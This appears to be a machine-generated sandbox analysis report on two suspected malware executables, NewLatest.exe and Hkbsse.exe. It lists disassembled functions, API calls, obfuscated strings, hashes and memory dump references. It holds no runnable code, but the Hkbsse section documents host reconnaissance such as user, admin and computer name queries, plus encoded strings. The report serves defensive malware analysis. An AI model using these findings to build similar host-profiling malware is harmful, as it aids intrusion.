API String ID: 2398240785-0
Opcode ID: 024c325a776a66ff3b37d806af482f5e3b8a6b2cfeeadf52505f16e070b9ff08
Instruction ID: 23766c9b341562b73724c2603f542ba1e8f25c84755440346e398096adcf3d70
Opcode Fuzzy Hash: 024c325a776a66ff3b37d806af482f5e3b8a6b2cfeeadf52505f16e070b9ff08
Instruction Fuzzy Hash: 48F06D32608115BBCB215FA2DC48D56BF6AFF543A03014610B859C74A0C7B2E8A19BD0

Function 000F4F15 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000EFE76: TlsGetValue.KERNEL32(?,?,000EF3F7,000EF224,?,?), ref: 000EFE7C

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 000F4F3F

Part of subcall function 000FE21E: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 000FE245
Part of subcall function 000FE21E: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 000FE25E
Part of subcall function 000FE21E: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 000FE2D4
Part of subcall function 000FE21E: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 000FE2DC

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 000F4F4D
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 000F4F57
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 000F4F61

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 7110b17195298fa4e3c02cb2ff1178d0ea37f31a50cee2b929f2309bbec6eb3f
Instruction ID: 98fbf442c77e461199b843e8493e7a8a659a9ee3815569eb7a7851ae6280f4a6
Opcode Fuzzy Hash: 7110b17195298fa4e3c02cb2ff1178d0ea37f31a50cee2b929f2309bbec6eb3f
Instruction Fuzzy Hash: B0F08B3160051C27CB11B320CC02CFEB7A95F80B10B04402AFB0153EA3EF209E04E7C2

Function 000F9420 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 000F9429

Part of subcall function 000EF3DB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 000F5396

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 000F944D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 000F9460
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 000F9469

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: 5549675469bb1c937cb2b3876dc899e5af7cf3e485631c260123e4c71f1447a3
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: 97F0E571200A244FE671AA648811FBE33D89F54711F00C41DE65B97A83CF64FD439B41

Function 0011696F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(000D86B0,0000000F,0012FAF0,00000000,000D86B0,?,0011505A,000D86B0,00000001,000D86B0,000D86B0,?,0010FF34,00000000,?,000D86B0), ref: 00116986
GetLastError.KERNEL32(?,0011505A,000D86B0,00000001,000D86B0,000D86B0,?,0010FF34,00000000,?,000D86B0,00000000,000D86B0,?,00110488,000D86B0), ref: 00116992

Part of subcall function 00116958: CloseHandle.KERNEL32(FFFFFFFE,001169A2,?,0011505A,000D86B0,00000001,000D86B0,000D86B0,?,0010FF34,00000000,?,000D86B0,00000000,000D86B0), ref: 00116968

___initconout.LIBCMT ref: 001169A2

Part of subcall function 0011691A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00116949,00115047,000D86B0,?,0010FF34,00000000,?,000D86B0,00000000), ref: 0011692D

WriteConsoleW.KERNEL32(000D86B0,0000000F,0012FAF0,00000000,?,0011505A,000D86B0,00000001,000D86B0,000D86B0,?,0010FF34,00000000,?,000D86B0,00000000), ref: 001169B7

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9282acd7079ab3ea5b549b3b3b244bc442d42d4779f7503744e4524f9f93fb5d
Instruction ID: b0314a3d5aa3d32fbbeac05c86bd881a5e22523b4cc7849379548b5ddc5876ba
Opcode Fuzzy Hash: 9282acd7079ab3ea5b549b3b3b244bc442d42d4779f7503744e4524f9f93fb5d
Instruction Fuzzy Hash: 51F01536000168BFCF262FA9EC08BDA3F26FB483A5F014121FA1985531C73388A1AB94

Function 000ED09F Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,000ED03C,00000064), ref: 000ED0C2
RtlLeaveCriticalSection.NTDLL(00135690), ref: 000ED0CC
WaitForSingleObjectEx.KERNEL32(001385C0,00000000,?,000ED03C,00000064,?,75920F00,?,000D759D,001385C0), ref: 000ED0DD
RtlEnterCriticalSection.NTDLL(00135690), ref: 000ED0E4

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 8f7390cf080c07810124e8dd19fc6f6031099d911b45ae4f74a2cb76e68e2a27
Instruction ID: 69574661c11050f491b62d5fe4943c692db8c23921385b2280ac943958ed3bcb
Opcode Fuzzy Hash: 8f7390cf080c07810124e8dd19fc6f6031099d911b45ae4f74a2cb76e68e2a27
Instruction Fuzzy Hash: E1E092B1902A24BFCB221F81EC0AA8D3F26EB0CF60F854111F90966530C76158A2CBD4

Function 00108EBA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe, xrefs: 00108EFD, 00108F3A

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe
API String ID: 0-3661964722
Opcode ID: 8f6b39b1842114d67e00943393e9c189d30e22e22db4331239d2fbbf55d30b08
Instruction ID: b5fa7b17652ade459469bb528fe6eba0f18ae1a2a2bca181a5158d3fc1f5323c
Opcode Fuzzy Hash: 8f6b39b1842114d67e00943393e9c189d30e22e22db4331239d2fbbf55d30b08
Instruction Fuzzy Hash: 1E41A371A08219AFDB119FA9DC81D9EBBBAEF99710F140066F484E72D1DBF09A41CB50

Function 0010556B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00105590

Strings

MOC, xrefs: 001055A2
RCC, xrefs: 001055AA

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 96758f5d3cb89eb21e08bc752f70ea8c81c726153ba48f5e9878cbf2b4136983
Instruction ID: e3c45f8337408f15ed84cf919a5086e17526dd86ac5f8d0d405a19564f2fb685
Opcode Fuzzy Hash: 96758f5d3cb89eb21e08bc752f70ea8c81c726153ba48f5e9878cbf2b4136983
Instruction Fuzzy Hash: 0E418BB2900609AFCF16DF94CC81AEE7BB6FF48300F198159F944A7291D7B69961CF50

Function 0010E350 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0010E0F9: GetOEMCP.KERNEL32(00000000,0010E36B,?,?,0010748E,0010748E,?), ref: 0010E124

_free.LIBCMT ref: 0010E3C8

Strings

X"t, xrefs: 0010E45F

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free
String ID: X"t
API String ID: 269201875-1832146207
Opcode ID: 7c581c98da7d3a75df05592ea6ad1ec6771af666c10c7becf6091fe6bba9560c
Instruction ID: 62621cc7b6b945f9d766ee13501da186d53d3becf1dbec0da497ea9f241b8ea1
Opcode Fuzzy Hash: 7c581c98da7d3a75df05592ea6ad1ec6771af666c10c7becf6091fe6bba9560c
Instruction Fuzzy Hash: 4531CF71900249AFDB01DF6AD884A9E7BF4BF44324F11486AF9509B2E1EBB1DD51CF50

Function 000EB4D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 000EB55E
RaiseException.KERNEL32(?,?,?,?), ref: 000EB583

Part of subcall function 00103A11: RaiseException.KERNEL32(E06D7363,00000001,00000003,0012E380,?,?,?,0012E380), ref: 00103A71

Part of subcall function 00108A8F: IsProcessorFeaturePresent.KERNEL32(00000017,0010A5CD,?,?,0010685A,?,?,?,?,0010748E,?), ref: 00108AAB

Strings

csm, xrefs: 000EB512

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: ecb7c723ca083758893a86a122774a9228ab151607a8477de939df2f295178e7
Instruction ID: 0bcef21f9f86510c48cfac034c9c54bf5677edcf3fde7962b869b9c0f495dd03
Opcode Fuzzy Hash: ecb7c723ca083758893a86a122774a9228ab151607a8477de939df2f295178e7
Instruction Fuzzy Hash: CE217532E00658EFCF25EF96D841AAEB3F9AF44710F540409E845BB251CB30AD45CB91

Function 00101611 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00101671
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001016BC

Strings

pContext, xrefs: 001016B4

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: a9d26c6e6b8aabf8feb7c235c571892362baaf034a9941bd32dbf17828fcc2aa
Instruction ID: 85c51a9527d63658312dfb398f13f92bb481a396008e59d5141f725a38c7cdb1
Opcode Fuzzy Hash: a9d26c6e6b8aabf8feb7c235c571892362baaf034a9941bd32dbf17828fcc2aa
Instruction Fuzzy Hash: C4110636B00114ABCB19FF64CC9596D77A9AF94360B194065EC92AB3C2DBF8DD018BC0

Function 000FB83C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 000FB85E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 000FB871

Strings

pContext, xrefs: 000FB869

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 40a3a2e4cf3a75229393bfbadc40845258bb9af923012342e389667e18740cdb
Instruction ID: 165fd16d262039fd4492f47c4e73c76d07e7b4b2c144883653416f56a4d2b573
Opcode Fuzzy Hash: 40a3a2e4cf3a75229393bfbadc40845258bb9af923012342e389667e18740cdb
Instruction Fuzzy Hash: CDE0923AB40118A7CB04FB65EC09CAEB7AD9FD47507144026EA11A3292EBB4EA158AD0

Function 000F33DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 000F340C

Strings

pScheduler, xrefs: 000F3404
version, xrefs: 000F33F1

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 24e44d38d1fb5c52890416b052c6dbd4e8b17f399a1b37f22176046b236fdc01
Instruction ID: 3dd60b63fd4fda8e752fd404673fef30304979570dd87f04f3ad7947939227bf
Opcode Fuzzy Hash: 24e44d38d1fb5c52890416b052c6dbd4e8b17f399a1b37f22176046b236fdc01
Instruction Fuzzy Hash: E4E0863468020CF6CB19FA54D847EED77A8DB20354F008021B751614A29BF4A798EA81

Analysis Process: Hkbsse.exePID: 3664, Parent PID: 1988COMMON

Executed Functions

Function 00B9E410 Relevance: 30.7, APIs: 6, Strings: 11, Instructions: 994
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Mc0k6MOc, xrefs: 00B9E44F
SvR+, xrefs: 00B9E704
2IJ=, xrefs: 00BA085D
2IF=, xrefs: 00BA04AA
2sJ=, xrefs: 00B9F5FD, 00B9F8DA
111, xrefs: 00B9F680
246122658369, xrefs: 00B9F617, 00B9F8F4, 00BA04C7, 00BA087A
SF==, xrefs: 00B9E475
4b955f, xrefs: 00B9FA6E
0p==, xrefs: 00B9E9EF, 00B9EC36
/!8, xrefs: 00B9E427, 00B9E9CA, 00B9F5D4, 00B9F8B5, 00B9FA57, 00BA07D7

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID: /!8$0p==$111$246122658369$2IF=$2IJ=$2sJ=$4b955f$Mc0k6MOc$SF==$SvR+
API String ID: 0-2275019626
Opcode ID: 4fa1a7c5bceaf4c5aab99f2700a5155625a304304007b718bbea00b15f9d3801
Instruction ID: c103e6ed160ddc5e32fc782fca9ad9802524f19c951057bb3f818ae17b613517
Opcode Fuzzy Hash: 4fa1a7c5bceaf4c5aab99f2700a5155625a304304007b718bbea00b15f9d3801
Instruction Fuzzy Hash: E182B670908248DBEF14DF68C9497DE7FF5AB46304F6081D8E815673C2D7B99A88CB92

Function 00B9EA2E Relevance: 38.9, APIs: 8, Strings: 13, Instructions: 2123
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00B9EA31
CreateDirectoryA.KERNEL32(00000000), ref: 00B9EB63
GetFileAttributesA.KERNEL32(00000000), ref: 00B9EC78
CreateThread.KERNEL32(00000000,00000000,00B9E3E0,00000000,00000000,00000000), ref: 00B9F6E9

Strings

stoi argument out of range, xrefs: 00BA07A4
2sJ=, xrefs: 00B9F5FD, 00B9F8DA, 00B9FCC3
111, xrefs: 00B9F680
4b955f, xrefs: 00B9FA6E
0p==, xrefs: 00B9EB21, 00B9EC36, 00B9EE69, 00B9F1AE
Lr3cDp==, xrefs: 00B9FDC4
M837MMft5HN=, xrefs: 00B9FD96
/!8, xrefs: 00B9F5D4, 00B9F8B5, 00B9FA57
invalid stoi argument, xrefs: 00BA0790
2IF=, xrefs: 00BA04AA
L8FcE8zCQ19l, xrefs: 00B9FDF9
246122658369, xrefs: 00B9F617, 00B9F8F4, 00B9FCE0, 00BA04C7
fbKkUv7x, xrefs: 00B9ED64

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AttributesCreateFile$DirectoryThread
String ID: /!8$0p==$111$246122658369$2IF=$2sJ=$4b955f$L8FcE8zCQ19l$Lr3cDp==$M837MMft5HN=$fbKkUv7x$invalid stoi argument$stoi argument out of range
API String ID: 3544085614-481236948
Opcode ID: d348e653e5477fc82607bfc3f3a7a26409e9c6ca4fba5c9d162566e15cebddfd
Instruction ID: 69a41f0dc8491c46cc294f645725615cb2526803828490d8974c873c5e5689c7
Opcode Fuzzy Hash: d348e653e5477fc82607bfc3f3a7a26409e9c6ca4fba5c9d162566e15cebddfd
Instruction Fuzzy Hash: D8F23971A141489BEF18DB38CD8979DBBF2AF46304F1081E8E405E73D6DB799A848B51

Function 00BA4EA0 Relevance: 38.6, APIs: 4, Strings: 17, Instructions: 1806COMMON

Download Yara Rule

APIs

Part of subcall function 00B96590: GetUserNameA.ADVAPI32(?,?), ref: 00B965EA
Part of subcall function 00B96590: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00B96630
Part of subcall function 00B96590: GetSidIdentifierAuthority.ADVAPI32(?), ref: 00B9663D

IsUserAnAdmin.SHELL32 ref: 00BA4FF7
GetUserNameA.ADVAPI32(?,?), ref: 00BA5087
GetComputerNameExW.KERNEL32(00000002,?,00000000,?,?), ref: 00BA50EB
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,?,?,?), ref: 00BA51F7

Part of subcall function 00BA7840: __Cnd_destroy_in_situ.LIBCPMT ref: 00BA7938
Part of subcall function 00BA7840: __Mtx_destroy_in_situ.LIBCPMT ref: 00BA7941

Strings

Qr9pHp==, xrefs: 00BA5489
1MNW, xrefs: 00BA53EE
1M3W, xrefs: 00BA534A
ew3W, xrefs: 00BA5321
f95=, xrefs: 00BA6353, 00BA6622
fvRW, xrefs: 00BA53C5
4b955f, xrefs: 00BA5459
dLVW, xrefs: 00BA54D2
/!8, xrefs: 00BA3537, 00BA4284, 00BA46A4, 00BA4ECB
gcRW, xrefs: 00BA54AB
gL9W, xrefs: 00BA539C
eSRW, xrefs: 00BA5440
1bpW, xrefs: 00BA5417
fRVW, xrefs: 00BA5467
246122658369, xrefs: 00BA4F0A, 00BA4F1D, 00BA4F5F, 00BA4F69, 00BA54C4
eRhW, xrefs: 00BA52ED
2v5W, xrefs: 00BA5373

Memory Dump Source

Source File: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000B.00000002.4489324597.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489597186.0000000000BE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489724498.0000000000BF2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489825281.0000000000BF4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4489964214.0000000000BF5000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000B.00000002.4490043899.0000000000BF9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b90000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Name$User$AccountAdminAuthorityCnd_destroy_in_situComputerFileIdentifierLookupModuleMtx_destroy_in_situ
String ID: /!8$1M3W$1MNW$1bpW$246122658369$2v5W$4b955f$Qr9pHp==$dLVW$eRhW$eSRW$ew3W$f95=$fRVW$fvRW$gL9W$gcRW
API String ID: 2186296352-3897546395
Opcode ID: 76a6212b35acff8ee94f0a8a10e1b2dd73c8d5c00f8bbe7855719f724e8cc63e
Instruction ID: af363590c6a6bfbea3d46a89db34b36e6e3c0b0abe10078ba88108b585db15de
